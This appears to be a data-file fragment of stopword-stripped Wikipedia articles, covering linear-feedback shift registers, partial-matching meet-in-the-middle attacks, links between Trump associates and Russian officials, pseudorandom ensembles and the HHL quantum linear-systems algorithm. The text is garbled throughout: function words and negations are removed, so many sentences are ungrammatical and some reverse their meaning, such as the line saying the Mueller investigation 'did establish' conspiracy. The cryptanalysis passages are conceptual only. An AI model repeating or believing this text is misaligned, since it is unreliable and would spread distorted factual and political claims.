&amp;0&amp;1\\c_{n-1}&amp;0&amp;\cdots &amp;\cdots &amp;0\end{pmatrix}}} suitable initialisation, {\displaystyle a'_{i}=\sum _{i=0}^{j}a_{i-j}c_{n-j},\ 0\leq i&lt;n} coefficient column vector {\displaystyle {\begin{pmatrix}c_{0}&amp;1&amp;0&amp;\cdots &amp;0\\c_{1}&amp;0&amp;1&amp;\ddots &amp;\vdots \\\vdots &amp;\vdots &amp;\ddots &amp;\ddots &amp;0\\c_{n-2}&amp;0&amp;\cdots &amp;0&amp;1\\c_{n-1}&amp;0&amp;\cdots &amp;\cdots &amp;0\end{pmatrix}}^{k}{\begin{pmatrix}a'_{0}\\a'_{1}\\a'_{2}\\\vdots \\a'_{n-1}\end{pmatrix}}} gives term original sequence. these forms generalize naturally arbitrary fields. example polynomials maximal lfsrs following table lists examples maximal-length feedback polynomials (primitive polynomials) shift-register lengths formalism maximum-length lfsrs developed solomon golomb 1967 book. number different primitive polynomials grows exponentially shift-register length calculated exactly using euler's totient function (sequence a011260 oeis). xilinx published extend list counters bit. tables maximum length polynomials available http://users.ece.cmu.edu/~koopman/lfsr/ generated https://github.com/hayguen/mlpolygen project. output-stream properties ones zeroes occur "runs". output stream 1110010, example, consists four runs lengths order. period maximal lfsr, 2n−1 runs occur example above, 3-bit lfsr runs). exactly half runs long, quarter bits long, single zeroes bits long, single ones bits long. this distribution almost equals statistical expectation value truly random sequence. however, probability finding exactly distribution sample truly random sequence rather low. lfsr output streams deterministic. present state positions gates lfsr known, next state predicted. this possible truly random events. with maximal-length lfsrs, much easier compute next state, easily limited number length. output stream reversible; lfsr mirrored taps cycle output sequence reverse order. value consisting zeros cannot appear. thus lfsr length cannot used generate values. applications lfsrs implemented hardware, makes useful applications require fast generation pseudo-random sequence, direct-sequence spread spectrum radio. lfsrs also used generating approximation white noise various programmable sound generators. uses counters repeating sequence states lfsr allows used clock divider counter non-binary sequence acceptable, often case computer index framing locations need machine-readable. lfsr counters simpler feedback logic natural binary counters gray-code counters, therefore operate higher clock rates. however, necessary ensure lfsr never enters all-zeros state, example presetting start-up state sequence. table primitive polynomials shows lfsrs arranged fibonacci galois form give maximal periods. obtain period adding lfsr longer period logic shortens sequence skipping states. uses cryptography lfsrs long used pseudo-random number generators stream ciphers, ease construction simple electromechanical electronic circuits, long periods, uniformly distributed output streams. however, lfsr linear system, leading fairly easy cryptanalysis. example, given stretch known plaintext corresponding ciphertext, attacker intercept recover stretch lfsr output stream used system described, stretch output stream construct lfsr minimal size simulates intended receiver using berlekamp-massey algorithm. this lfsr intercepted stretch output stream recover remaining plaintext. three general methods employed reduce problem lfsr-based stream ciphers: non-linear combination several bits lfsr state; non-linear combination output bits lfsrs (see also: shrinking generator); using evolutionary algorithm introduce non-linearity. irregular clocking lfsr, alternating step generator.important lfsr-based stream ciphers include a5/1 a5/2, used cell phones, used bluetooth, shrinking generator. a5/2 cipher broken a5/1 serious weaknesses.the linear feedback shift register strong relationship linear congruential generators. uses circuit testing lfsrs used circuit testing test-pattern generation (for exhaustive testing, pseudo-random testing pseudo-exhaustive testing) signature analysis. test-pattern generation complete lfsr commonly used pattern generators exhaustive testing, since cover possible inputs n-input circuit. maximal-length lfsrs weighted lfsrs widely used pseudo-random test-pattern generators pseudo-random test applications. signature analysis built-in self-test (bist) techniques, storing circuit outputs chip possible, circuit output compressed form signature later compared golden signature good circuit) detect faults. since compression lossy, always possibility faulty output also generates signature golden signature faults cannot detected. this condition called error masking aliasing. bist accomplished multiple-input signature register (misr msr), type lfsr. standard lfsr single xnor gate, input gate connected several "taps" output connected input first flip-flop. misr structure, input every flip-flop xor/xnor gate. example, 4-bit misr 4-bit parallel output 4-bit parallel input. input first flip-flop xor/xnord parallel input zero "taps". every flip-flop input xor/xnord preceding flip-flop output corresponding parallel input bit. consequently, next state misr depends last several states opposed current state. therefore, misr always generate golden signature given input sequence every time. recent applications proposing set-reset flip-flops "taps" lfsr. this allows bist system optimise storage, since set-reset flip-flops save initial seed generate whole stream bits lfsr. nevertheless, requires changes architecture bist, option specific applications. uses digital broadcasting communications scrambling prevent short repeating sequences (e.g., runs forming spectral lines complicate symbol tracking receiver interfere transmissions, data sequence combined output linear-feedback register modulation transmission. this scrambling removed receiver demodulation. when lfsr runs rate transmitted symbol stream, technique referred scrambling. when lfsr runs considerably faster symbol stream, lfsr-generated sequence called chipping code. chipping code combined data using exclusive transmitting using binary phase-shift keying similar modulation method. resulting signal higher bandwidth data, therefore method spread-spectrum communication. when used spread-spectrum property, technique called direct-sequence spread spectrum; used distinguish several signals transmitted channel time frequency, called code-division multiple access. neither scheme confused encryption encipherment; scrambling spreading lfsrs protect information eavesdropping. they instead used produce equivalent streams possess convenient engineering properties allow robust efficient modulation demodulation. digital broadcasting systems linear-feedback registers: atsc standards (digital transmission system north america) (digital audio broadcasting system radio) dvb-t (digital transmission system europe, australia, parts asia) nicam (digital audio system television)other digital communications systems using lfsrs: intelsat business service (ibs) intermediate data rate (idr) hdmi (serial digital interface transmission) data transfer pstn (according itu-t v-series recommendations) cdma (code division multiple access) cellular telephony 100base-t2 "fast" ethernet scrambles bits using lfsr 1000base-t ethernet, common form gigabit ethernet, scrambles bits using lfsr express sata serial attached scsi (sas/spl) ieee 802.11a scrambles bits using lfsr bluetooth energy link layer making lfsr (referred whitening) satellite navigation systems glonass. current systems lfsr outputs generate ranging codes chipping code cdma dsss) modulate carrier without data (like ranging code). glonass also uses frequency-division multiple access combined dsss. other uses lfsrs also used radio jamming systems generate pseudo-random noise raise noise floor target communication system. german time signal dcf77, addition amplitude keying, employs phase-shift keying driven 9-stage lfsr increase accuracy received time robustness data stream presence noise. also pinwheel mersenne twister maximum length sequence analog feedback shift register nlfsr, non-linear feedback shift register ring counter pseudo-random binary sequence gold sequence sequence kasami sequence berlekamp–massey algorithm references further reading http://www.xilinx.com/support/documentation/application_notes/xapp052.pdf https://web.archive.org/web/20161007061934/http://courses.cse.tamu.edu/csce680/walker/lfsr_table.pdf http://users.ece.cmu.edu/~koopman/lfsr/index.html tables maximum length feedback polynomials 2-64 bits. https://github.com/hayguen/mlpolygen code generating maximal length feedback polynomials external links lsfr intrinsic generation randomness: notes from</t>
  </si>
  <si>
    <t>Partial-matching meet-in-the-middle attack</t>
  </si>
  <si>
    <t>partial-matching technique used mitm attack. partial-matching intermediate values mitm attack, {\displaystyle {\displaystyle computed plaintext ciphertext, matched select bits, instead complete state. uses limitation mitm attacks amount intermediate values needs stored. order compare intermediate values {\displaystyle {\displaystyle {\displaystyle need computed stored first, computed {\displaystyle compared them. subciphers identified mitm attack sufficiently large subkey, unfeasible amount intermediate values need stored. while techniques cycle detection algorithms allows perform mitm attack without storing either values {\displaystyle {\displaystyle techniques requires subciphers mitm attack symmetric. thus solution allows perform mitm attack situation, subkeys cardinality large enough make amount temporary values need stored infeasible. while allows store temporary values, still limited, allows perform mitm attack subcipher bits. example: intermediate value stored, subkey needs bits larger, amount memory required anyway, since {\displaystyle 2^{-3}=1/8} cases useful feature provided partial-matching mitm attacks, ability compare intermediate values computed different rounds attacked cipher. diffusion round cipher enough, might possible span rounds find bits intermediate states changed probability these bits intermediate states still compared. disadvantage uses, false positives candidates, needs tested. rule, chance false positive given probability {\displaystyle 2^{-|i|}} {\displaystyle |i|} amount matched bits. example step-by-step example complete attack ktantan, example 3-subset mitm page. this example deals part needs partial-matching. what useful know ktantan 254-round blockcipher, round uses bits 80-bit key. 3-subset attack ktantan family ciphers, necessary utilize partial-matching order stage attack. partial-matching needed, intermediate values plain- ciphertext mitm attack, computed round start round 131, respectively. since span rounds them, could compared directly. authors attack, however, identified useful characteristics ktantan held probability diffusion round ktantan (the security number rounds), found computing forwards round backwards round round 127, bits intermediate states would remain unchanged. bits round ktantan32. bits round bits round ktantan48 ktantan64, respectively). comparing bits intermediate value, authors able orchestrate mitm attack cipher, despite rounds subciphers. using partial-matching increased amount false positives, nothing noticeably increased complexity attack. notes</t>
  </si>
  <si>
    <t>Links between Trump associates and Russian officials</t>
  </si>
  <si>
    <t>since donald trump 2016 candidate office president united states, numerous links trump associates people ties russian government identified fbi, special counsel several united states congressional committees, part investigations russian interference 2016 united states elections. following intelligence reports russian interference, trump campaign members, business partners, administration nominees, family members subjected intense scrutiny determine whether improper dealings contacts russian officials. several people connected trump campaign made false statements links obstructed investigations.starting 2015, several allied foreign intelligence agencies began reporting secret contacts trump campaigners known suspected russian agents multiple european cities. november 2016, russian deputy foreign minister sergei ryabkov contradicted trump's denials confirming trump campaign contact russia, stating 2016 interfax news agency interview: "obviously, know people entourage," adding cannot quite staying touch russian representatives."the senate intelligence committee russia report described "secretive meetings communications russian representatives... signaled little intention incoming administration punish russia assistance provided unprecedented attack american democracy." ultimately, mueller's investigation "did establish members trump campaign conspired coordinated russian government election interference activities". overview many years, intensive public scrutiny trump's ties russia. book excerpt published politico, former guardian russia correspondent luke harding stated files declassified 2016 indicated czech spies closely followed trump then-wife ivana trump manhattan trips czechoslovakia time marriage 1977. natalia irina dubinin, daughters then-soviet ambassador yuri dubinin, cited indicating seemingly chance meeting father trump autumn 1986, part dubinin's assignment establish contact america's business elite determined effort soviet government cultivate trump particular.this effort extended series subsequent events, also documented donald trump's book deal, including meeting 1986 ambassador trump trump tower dubinin's subsequent invitation trump visit moscow (which handled kgb-affiliated intourist future russian permanent representative united nations vitaly churkin). harding also asserts "top level soviet diplomatic service arranged 1987 moscow visit. with assistance kgb... chief [vladimir kryuchkov] wanted staff abroad recruit americans." harding cited trump writing trip included tour half dozen potential sites hotel, including several near square" "was impressed ambition soviet officials make deal".by april 2019, york times documented "donald trump associates least contacts russian nationals wikileaks, intermediaries, 2016 campaign presidential transition."the moscow project initiative center american progress action fund had, june 2019, documented "272 contacts trump's team russia-linked operatives including least meetings.... none contacts ever reported proper authorities. instead, trump team tried cover every single them."the york times reported june 2021 2017 2018 trump's justice department subpoenaed metadata icloud accounts least dozen people associated house intelligence committee, including democratic ranking member adam schiff eric swalwell, family members, investigate leaks press contacts trump associates russia. records inquiry implicate anyone associated committee, upon becoming attorney general william barr revived effort, including appointing federal prosecutor others february 2020. times reported that, apart corruption investigations, subpoenaing communications information members congress nearly unheard-of, justice department barr's approach politically motivated. justice department inspector general michael horowitz announced inquiry matter times report. 2015-2016 foreign surveillance late 2015, gchq, british eavesdropping agency, course routine surveillance, used "electronic intelligence" collect information russian targets. they found "russians talking people associated trump...according sources [the conversations] formed suspicious pattern." british passed information "suspicious 'interactions'" "members donald trump's campaign team" "known suspected russian agents" intelligence agencies. over next months, european allies began "pass along information people close trump meeting russians netherlands, britain countries." reports "contacts trump's inner circle russians" shared several allied foreign intelligence agencies (reportedly united kingdom, germany, estonia, poland, australia, france, netherlands). later, agencies began picking conversations russians discussing contacts trump associates".in march 2017, york times reported british dutch agencies evidence meetings "russian officials others close russia's president, vladimir putin associates president-elect trump". separately, u.s. intelligence overheard russian officials, within kremlin, talking contacts trump associates. some russian officials arguing much interfere election. then cyber attacks state electoral systems obama administration directly accuse russians interfering.because allowed surveil private communications american citizens without warrant, "fbi slow appreciate extensive nature contacts trump's team moscow." 2016 campaign during 2016 campaign, trump repeatedly praised russian president vladimir putin strong leader. peter conradi, magazine, described relationship "bromance".between 2013 2015, trump stated relationship with" putin, once", spoke indirectly directly president putin, could nicer." from 2016, election campaign, stance changed. during press conference july 2016, claimed, never putin, know putin never spoken him", july interview said, relationship him."in november 2016, russian deputy foreign minister sergei ryabkov told interfax news agency, "obviously, know people entourage", cannot quite staying touch russian representatives." 2017 several trump advisers, including former national security advisor michael flynn former campaign manager paul manafort, connected russian officials, viktor yanukovich pro-russian ukrainian officials.the york times wrote 2017, citing intelligence sources, russian agents overheard campaign saying could manafort flynn influence trump. members trump's campaign, later white house staff, particularly flynn jared kushner, contact russian government officials november election, including contacts initially disclose. newspaper reports wall street journal reported united states intelligence agencies monitoring russian espionage found kremlin officials discussing trump's associates spring 2015. time, u.s. intelligence analysts reportedly confused, alarmed, intercepted conversations. july 2017, conversations re-examined light recently disclosed trump tower meeting involving donald trump russian lawyer natalia veselnitskaya.the york times reported multiple trump associates, including manafort members campaign, repeated contacts senior russian intelligence officials 2016, although officials said that, far, evidence trump's campaign cooperated russians influence election. manafort said knowingly meet russian intelligence officials. meetings kislyak after senator jeff sessions, part trump campaign, first denied contact russians campaign, even though russian ambassador sergey kislyak, michael flynn, also member campaign, lied twice meetings kislyak, media focused negative attention kislyak. national security experts "generally agree sessions trump campaign officials handled russia issue poorly. sessions, say, told congress meeting kislyak. flynn reckless wrong speak russian diplomats sanctions transition period obama still president."kremlin spokesman dmitry peskov told "electoral process" discussed meetings, kislyak also "people working think tanks advising hillary advising people working hillary" campaign.in particular, kislyak several trump campaign members, transition team members, administration nominees. involved people dismissed meetings routine conversations preparation assuming presidency. trump's team issued least twenty denials concerning communications campaign russian officials; several later turned false.the trump administration reportedly asked help countering news reports alleged contacts russia.former ambassadors michael mcfaul john beyrle said "extremely troubled" evidence russian interference u.s. election. both supported independent investigation matter, dismissed "preposterous" allegations kislyak participated particularly meetings trump campaign: "kislyak's meet government officials campaign people," mcfaul stated. "people meet russian ambassador wrong criminalize discourage it." december 2016 trump tower meeting march, 2017, trump's white house disclosed kushner, kislyak, flynn trump tower december 2016. meeting, washington post reported kushner requested direct, russian-encrypted communications channel allow secret communication russia circumvent safeguards place united states intelligence community. some sources told post purpose link would allow flynn speak directly russian military officials syria issues, others pointed would reason discussions concealed appropriate government officials. communications channel actually according sources.after meeting, kislyak sent report meeting kremlin using thought secure channels, report intercepted american intelligence. kislyak reportedly taken aback request expressed concern security implications stake american secure communications kremlin diplomatic outposts. march 2017 former acting director michael morell stated march 2017 seen evidence conspiracy trump kremlin: question trump campaign conspiring russians here, smoke, fire, all."in march 2017 interview chuck todd, james clapper, director national intelligence president obama january 2017, revealed state knowledge time: clapper stopped receiving briefings january "not aware counterintelligence investigation director comey first referred testimony house permanent select committee intelligence 20th march". stated clapper "taken major defense away white house." 2019 after months investigation, special counsel robert mueller submitted report justice department march 2019. investigation "did establish members trump campaign conspired coordinated russian government election interference activities".attorney general william barr ordered united states department justice office inspector general michael horowitz investigate investigation 2016 donald trump campaign. investigation largely based 2016 conversation trump campaign adviser george papadopoulos australian diplomat alexander downer london. papadopolous reportedly said heard russia thousands emails democratic nominee hillary clinton. inspector general released report december 2019, concluding investigation justified done correctly, although mistakes made. barr rejected findings report, although could order horowitz alter report inspector general operates independently department. president trump called report disgrace" said waiting parallel report done john durham, united states attorney district connecticut. 2020 august 2020, roger stone dropped appeal seven felony convictions related house representatives investigation ties trump campaign russia. this came trump commuted stone's 40-month prison term $20,000 fine.the united states senate select committee intelligence released final report august 2020. report concluded significant ties 2016 trump presidential campaign russia. particular, noted paul manafort hired konstantin kilimnik, "russian intelligence officer," kilimnik possibly connected 2016 hack leak operation. investigation senator richard burr (r-nc) burr stepped aside unrelated investigation allegedly illegal stock trades: senator marco rubio (r-fl) committee. trump administration members michael flynn december 2015, michael flynn paid $45,000 russia today, kremlin-supported television channel, delivering talk moscow, russia provided three-day, all-expenses-paid trip. retired military intelligence officer, flynn required obtain prior permission defense department state department receiving money foreign governments; flynn apparently seek approval speech. months later, february 2016 applying renewal security clearance, stated received income foreign companies "insubstantial contact" foreign nationals. glenn fine, acting defense department inspector general, confirmed investigating flynn.on november 2016, president obama warned president-elect trump hiring flynn. trump appointed flynn national security advisor november 2016, flynn forced resign february 2017, revealed december 2016, obama announced sanctions russia, flynn discussed sanctions phone russian ambassador sergey kislyak. flynn earlier acknowledged speaking kislyak denied discussing sanctions.on march 2017, york times reported flynn kushner kislyak december 2016 establish secret line communication (backchannel) trump administration russian government. 2017, reported december meeting, kushner flynn asked russians direct, encrypted communications channel moscow, flynn could speak directly russian military officials syria matters without knowledge american intelligence agencies. kislyak hesitant allow americans access russia's secure communications network, channel actually up.on 2017, house intelligence committee served flynn subpoenas testimony production personal documents business records. september wall street journal reported flynn promoted russian-backed, multibillion-dollar middle eastern nuclear plant project working white house. project involved building nuclear reactors across middle east, security provided rosoboron, russian state-owned arms exporter american sanctions. september buzzfeed reported flynn, kushner, bannon secretly king abdullah jordan january 2017, press nuclear power plant project.on december 2017, flynn pleaded guilty lying later pardoned trump. jared kushner special counsel investigated kushner's finances, business activities, meetings russian banker sergey gorkov russian ambassador sergey kislyak.in april 2017, reported donald trump's son-in-law senior advisor, jared kushner, application secret security clearance, failed disclose numerous meetings foreign officials, including sergey kislyak sergey gorkov, head russian state-owned bank vnesheconombank. kushner's lawyers called omissions error". vnesheconombank said meeting business-related, connection kushner's management kushner companies. trump administration said diplomatic meeting.according u.s. officials, investigators believe kushner important information regarding investigation. mid-december 2016, trump "was openly feuding american intelligence agencies", kushner thirty minutes russian banker sergey gorkov, "whose financial institution deeply intertwined russian intelligence" "under sanction united states". late 2017, meeting "come increasing scrutiny" senate intelligence committee, "current former american officials" said part effort kushner establish direct line putin outside established diplomatic channels." wilbur ross reported paradise papers, secretary commerce wilbur ross shares navigator, publicly traded shipping company contracts russian company sibur, held off-shore accounts. co-owners sibur ties vladimir putin u.s. sanctions. anthony scaramucci july 2017, anthony scaramucci, trump campaign member appointed white house communications director, involved discussions joint investments firm sanctioned russian government fund. scaramucci kirill dmitriev, head russian direct investment fund, billion state investment firm u.s. government sanctions. scaramucci confirmed meeting took place, saying "long known" dmitriev, criticized american sanctions ineffective. june 2017, published story alleged congressional investigation scaramucci's relationship fund. story quickly retracted "not solid enough publish as-is", resulted resignation three employees. jeff sessions march 2017, revealed still u.s. senator, attorney general jeff sessions, early prominent supporter trump's campaign, spoke twice russian ambassador kislyak election july 2016 september 2016. january confirmation hearing become attorney general, stated aware contacts trump campaign russian government, adding "did communications russians." march 2017, stated answer misleading, clarifying "never russian officials discuss issues campaign." march 2017, meeting senior career officials justice department, sessions announced would recuse investigations russia's interference 2016 presidential election. investigations, deputy attorney general rosenstein served acting attorney general. january 2018, york times reported sessions interviewed mueller's team previous week. tillerson former exxonmobil tillerson, appointed secretary state president trump, close ties russia vladimir putin. managed russia account exxonmobil, appointed exxon 2006 largely strength russian relationships. 2011, tillerson struck major deal russia state-owned company rosneft, giving exxonmobil access resources russian arctic. recognition, tillerson awarded russian order friendship, russia's highest decoration foreign citizens. tillerson known putin since work russia 1990s, according john hamre, interactive time vladimir putin probably american exception henry kissinger". trump campaign members michael caputo republican public relations media consultant michael caputo worked gazprom russia, later adviser trump campaign. caputo lived russia 1994 2000, employed gazprom-media, period contracted gazprom public relations work oriented toward raising vladimir putin's support level u.s. returned u.s. former mentor roger stone convinced move miami beach, florida; caputo founded media advising company. caputo moved back europe 2007 advising politician's campaign parliament ukraine. caputo worked campaign manager carl paladino's 2010 governor york state. caputo charge trump campaign's communications york state republican primary approximately november 2015 april 2016, left campaign summer 2016. inquiry house intelligence committee part investigation russian interference 2016 u.s. presidential election, caputo denied ties russian government working trump campaign. june 2018, caputo admitted interview told mueller investigation contacts henry greenberg, russian claiming information hillary clinton, contrast told house intelligence committee 2017. caputo since modified testimony closed house intelligence committee investigation reflect contact henry greenberg. paul manafort february 2017, york times reported paul manafort repeated contacts senior russian intelligence officials 2016. manafort said knowingly meet russian intelligence officials. intercepted communications campaign show russian officials believed could manafort influence trump. june 2017, special counsel robert mueller assumed criminal probe manafort, predated 2016 election counterintelligence probe july 2016 began investigating possible collusion moscow associates trump. manafort forced resign trump campaign chairman august 2016 amid questions business dealings ukraine years earlier. september 2017, reported wiretapped manafort 2014 unspecified date 2016 fall 2016 early 2017, pursuant separate foreign intelligence surveillance (fisa) court orders. confirmed trump's conversations manafort intercepted part surveillance. also confirmed "mueller's team provided details communications."in october 2017, manafort indicted federal grand jury arrested twelve criminal charges including conspiracy, money laundering, failure register agent foreign power, false statements. charges arose consulting work pro-russian government ukraine unrelated trump campaign. manafort pleaded guilty placed house arrest. february 2018, manafort indicted federal charges including evasion, money laundering fraud relating foreign lobbying before, 2016 campaign. following day, rick gates pleaded guilty charges, indicted additional charges relating pro-russian lobbying united states.on september manafort entered plea deal prosecutors, pleading guilty charge conspiracy charge conspiracy obstruct justice, also agreeing co-operate special counsel investigation. mueller's office stated november 2018, court filing supposedly co-operating manafort repeatedly lied variety matters, breaching terms plea agreement. december 2018, special counsel's office filed document court listing five areas manafort lied them. january 2019, manafort's lawyers submitted filing court response accusation. through error redacting, document accidentally revealed campaign chairman, manafort konstantin kilimnik, believed linked russian intelligence. filing says manafort gave polling data related 2016 campaign discussed ukrainian peace plan him. rick gates rick gates, longtime business partner protégé paul manafort, senior member trump campaign. continued work trump manafort's resignation trump's election president, april 2017 forced resign pro-trump lobbying group "amid questions russian interference 2016 election". records reviewed york times showed gates held meetings moscow associates oleg deripaska, "his name appears documents linked shell companies manafort’s firm cyprus receive payments politicians businesspeople eastern europe." gates worked manafort promote viktor yanukovych pro-russian factions ukraine. russian oligarch oleg deripaska biggest investor davis manafort, lobbying investment firm employed gates.in october 2017, gates indicted federal grand jury arrested twelve criminal charges including conspiracy, money laundering, failure register agent foreign power, false statements. charges arose consulting work pro-russian government ukraine unrelated trump campaign. gates pleaded guilty placed house arrest. february 2018, gates indicted federal charges including evasion, money laundering fraud relating foreign lobbying before, 2016 campaign. following day, gates pleaded guilty making false statements conspiracy defraud united states agreed cooperate mueller's investigation. second indictments stand pending gates' cooperation assistance mueller investigation. carter page march 2016 interview, trump identified carter page, previously investment banker moscow, foreign policy adviser campaign. page became foreign policy adviser trump summer 2016. during investigation russian interference 2016 u.s. elections, page's past contacts russians came public attention. 2013, page viktor podobnyy, junior attaché permanent mission russian federation united nations, energy conference, provided documents u.s. energy industry. page later said provided "basic immaterial information publicly available research documents" podobnyy. podobnyy later group three russian charged u.s. authorities participation russian ring. podobnyy protected diplomatic immunity prosecution; third man, spying russia non-diplomatic cover, pleaded guilty conspiring unregistered foreign agent sentenced prison. attempted recruit page work svr, russian intelligence service. interviewed page 2013 part investigation ring, decided known spy, never accused page wrongdoing. page subject four foreign intelligence surveillance (fisa) warrants, first 2014, least years earlier indicated stories concerning role 2016 presidential campaign donald trump. 2017 news accounts warrant indicated granted page's ties buryakov, podobnyy, third russian attempted recruit him, igor sporyshev.page dropped trump team reports investigation federal authorities. justice department obtained fisa warrant monitor page's communications october 2016, made case probable cause think page acting agent foreign power. page told washington post considered "unjustified, politically motivated government surveillance." according nunes memo, 90-day warrant renewed three times. february 2017, page stated meetings russian officials 2016, days later deny meeting russian ambassador sergey kislyak 2016 republican national convention cleveland. page's revised account occurred news reports revealed attorney general jeff sessions likewise kislyak. march 2017, page called senate intelligence committee investigating links trump campaign russian government. march 2017, hope hicks, trump spokesperson, distanced campaign page, stating page "informal foreign policy adviser" "not speak trump campaign."in september 2017, page filed defamation lawsuit media company oath inc. outlets' reporting alleged meetings russian officials. suit dismissed march 2018 lacking factual accusations defamation. february 2021, page lost defamation suit filed yahoo! news huffpost articles described activities mentioned steele dossier. judge said page admitted articles potential contacts russian officials essentially true.in january 2021, lawyer, kevin clinesmith, sentenced probation "making false statement" intentionally altering internal email connection fisa request continue government surveillance former trump campaign official carter page 2016 2017. george papadopoulos march 2016, george papadopoulos, foreign policy adviser trump campaign, sent email seven campaign officials subject line "meeting russian leadership including putin", offering meeting russian leadership discuss us-russia ties president trump". trump campaign advisers clovis charles kubic objected proposed meeting. 2016, ivan timofeev, official russian international affairs council, emailed papadopoulos setting meeting trump russian officials moscow. papadopoulos forwarded email paul manafort, responded, need someone communicate [trump] trips."papadopoulos arrested july 2017 subsequently cooperated special counsel robert mueller's investigation. october 2017 pleaded guilty single charge making false statement investigators. guilty plea part plea bargain agreed cooperate government "provide information regarding matters government deems relevant."following this, september 2018, papadopoulos sentenced days prison, months supervised release, hours community service fined $9,500. later pardoned trump december 2020. roger stone roger stone, former adviser donald trump self-proclaimed political "dirty trickster", said march 2017 august 2016, contact guccifer 2.0, hacker persona publicly claimed responsibility least hack dnc, believed operated russian intelligence. 2019 filing, prosecutors claimed stone communicated wikileaks, sought details scope information stolen democratic party. just prior election, clinton campaign accused stone prior knowledge hacks, wrote, "trust soon [sic] podesta's time barrel" twitter shortly wikileaks released podesta emails. stone claimed actually referring reports podesta group's ties russia. opening statement united states house permanent select committee intelligence september 2017, stone reiterated explanation: "note tweet august 2016, makes mention whatsoever podesta's email, accurately predict podesta brothers' business activities russia would come public scrutiny." stone reportedly stated privately republican colleagues communicated julian assange least occasion, although stone attorneys since denied this. instead, stone "clarified mutual journalist friend", stone ultimately named randy credico.on january 2019, stone arrested fort lauderdale, florida home connection robert mueller's special counsel investigation charged indictment witness tampering, obstructing official proceeding, five counts making false statements. pleaded guilty denied wrongdoing press interviews. stone convicted seven counts november 2019, sentenced february 2020. sentence later commuted trump. donald trump 2016, donald trump aleksandr torshin maria butina national rifle association-sponsored dinner. both torshin butina worked broker secret meeting then-candidate trump russian president putin. june 2016, donald trump jr., jared kushner paul manafort meeting russian lawyer natalia veselnitskaya promised information hillary clinton. trump told york times meeting magnitsky act. emails proposing meeting, publicist goldstone mention magnitsky instead promised "documents information would incriminate hillary" "part russia government's support trump", donald trump responded, love it."on october 2017, reported scott balber, formerly lawyer donald trump billionaire aras agalarov's lawyer, obtained memo veselnitskaya showed focus meeting repealing magnitsky sanctions, "not providing damaging information clinton". subsequently, foreign policy published full memo took meeting. trump business partners michael cohen 2017, inquiries alleged russian meddling u.s. election expanded, house senate congressional panels asked president donald trump's personal lawyer michael cohen, trump's closest confidants, provide information testimony communications people connected kremlin.on 2017, house intelligence committee subpoenaed cohen testify produce personal documents business records. trump supporters nigel farage june 2017, guardian reported nigel farage, former leader united kingdom independence party first non-american political figures meet trump following election, person interest investigation, farage denied. farage previously russian ambassador united kingdom alexander yakovenko, roger stone julian assange, guardian's source quoted saying, triangulate russia, wikileaks, assange trump associates, person comes hits nigel farage". andrei nikolaev andrei nikolaev, russian billionaire businessman konstantin nikolaev financially supported foreign agent maria butina 2012 2014, worked trump campaign headquarters washington d.c. trump international hotel trump's inauguration january 2017. erik prince april 2017, washington post reported around january 2017, nine days donald trump's inauguration, erik prince, founder blackwater security company, secretly unidentified russian close vladimir putin, seychelles. trump administration said "not aware meetings" said prince involved trump transition. according u.s., european, arab officials, meeting arranged united arab emirates purpose establish back-channel link trump putin. trump's associates reportedly tried convince russia limit support iran syria. prince also appeared close ties trump's chief strategist, stephen bannon. seychelles meeting took place previous meetings york trump associates officials russia emirates, official contacts trump administration russian agents coming close scrutiny press u.s. intelligence community. u.s. officials said investigating seychelles meeting; refused comment.two intelligence officials confirmed news seychelles meeting took place. corroborated washington post's account, said clear whether initiative arrange meeting came trump's associates trump transition people directly involved. second official said meeting "middle east policy, cover yemen, syria, iraq iran", russia.prince's spokesperson said, "erik role transition team, complete fabrication. meeting nothing president trump. so-called under-resourced intelligence community messing around surveillance american citizens hunting terrorists?" senior trump administration official called story trump-putin back-channel "ridiculous".the york times reported 2018, donald trump intermediary george nader, erik prince, joel zamel trump tower august 2016. nader reportedly told trump crown princes saudi arabia eager help father election, zamel pitched social media manipulation campaign. trump reportedly responded favorably nader subsequently frequent meetings steve bannon, michael flynn jared kushner. times reported prince arranged august 2016 meeting; prince stated november 2017, testimony house intelligence committee formal communications contact, unofficial role, trump campaign. congressional intelligence committee investigations investigations began late july 2016. 2017, former director robert mueller appointed special counsel expansion fbi's investigation. senate intelligence committee house intelligence committee also conducted inquiries.the senate intelligence committee described concerns secret meetings: 2017, glenn fine, acting defense department inspector general, confirmed investigating michael flynn misleading pentagon investigators income companies russia contacts officials applied renewal top-secret security clearance. october 2017, paul manafort rick gates indicted arrested. george papadopoulos flynn pleaded guilty lying russia investigation. papadopolous served sentence. flynn pardoned president trump following decision department justice drop charges judge emmet sullivan delayed granting dismissal.after months investigation, special counsel robert mueller submitted report justice department march 2019. investigation "did establish members trump campaign conspired coordinated russian government election interference activities". media reports york times reported february 2017, phone records communications intercepts showed trump associates—including members trump campaign—had "repeated contacts" senior russian intelligence officials 2</t>
  </si>
  <si>
    <t>Pseudorandom ensemble</t>
  </si>
  <si>
    <t>cryptography, pseudorandom ensemble family variables meeting following criteria: {\displaystyle u=\{u_{n}\}_{n\in \mathbb uniform ensemble {\displaystyle x=\{x_{n}\}_{n\in \mathbb ensemble. ensemble {\displaystyle called pseudorandom {\displaystyle {\displaystyle indistinguishable polynomial time. references goldreich, oded (2001). foundations cryptography: volume basic tools. cambridge university press. isbn 0-521-79172-3. fragments available author's site.</t>
  </si>
  <si>
    <t>Quantum algorithm for linear systems of equations</t>
  </si>
  <si>
    <t>quantum algorithm linear systems equations, also called algorithm, designed aram harrow, avinatan hassidim, seth lloyd, quantum algorithm published 2008 solving linear systems. algorithm estimates result scalar measurement solution vector given linear system equations.the algorithm main fundamental algorithms expected provide speedup classical counterparts, along shor's factoring algorithm, grover's search algorithm, quantum fourier transform quantum simulation. provided linear system sparse condition number {\displaystyle \kappa user interested result scalar measurement solution vector, instead values solution vector itself, algorithm runtime {\displaystyle o(\log(n)\kappa ^{2})} {\displaystyle number variables linear system. this offers exponential speedup fastest classical algorithm, runs {\displaystyle o(n\kappa {\displaystyle o(n{\sqrt {\kappa }})} positive semidefinite matrices). implementation quantum algorithm linear systems equations first demonstrated 2013 al., barz parallel. demonstrations consisted simple linear equations specially designed quantum devices. first demonstration general-purpose version algorithm appeared 2018 work zhao al.due prevalence linear systems virtually areas science engineering, quantum algorithm linear systems equations potential widespread applicability. procedure problem trying solve given {\displaystyle n\times hermitian matrix {\displaystyle unit vector {\displaystyle {\overrightarrow {b}}} find solution vector {\displaystyle {\overrightarrow {x}}} satisfying {\displaystyle a{\overrightarrow {x}}={\overrightarrow {b}}} this algorithm assumes user interested values {\displaystyle {\overrightarrow {x}}} itself, rather result applying operator 